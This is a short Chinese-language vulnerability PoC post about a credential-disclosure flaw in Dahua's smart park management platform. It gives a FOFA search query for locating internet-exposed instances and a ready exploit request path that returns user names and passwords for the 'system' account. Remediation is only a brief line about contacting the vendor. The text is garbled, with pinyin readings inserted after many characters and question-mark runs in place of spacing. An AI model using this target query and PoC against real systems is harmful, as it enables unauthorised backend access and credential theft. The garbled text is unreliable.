Nx01 產(chǎn)品簡(jiǎn)介

????????大華智慧園區(qū)綜合管理平臺(tái)是一款綜合管理平臺(tái)，具備園區(qū)運(yùn)營(yíng)、資源調(diào)配和智能服務(wù)等功能。該平臺(tái)旨在協(xié)助優(yōu)化園區(qū)資源分配，滿足多元化的管理需求，同時(shí)通過(guò)提供智能服務(wù)，增強(qiáng)使用體驗(yàn)。

Nx02 漏洞描述

????????大華智慧園區(qū)綜合管理平臺(tái)存在信息泄露漏洞，攻擊者通過(guò)此漏洞獲取用戶名及密碼進(jìn)行后臺(tái)登陸。

Nx03 產(chǎn)品主頁(yè)

fofa-query: app.name="Dahua 大華 智慧園區(qū)管理平臺(tái)"

Nx04 漏洞復(fù)現(xiàn)

POC：

/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修復(fù)建議

建議聯(lián)系軟件廠商進(jìn)行處理。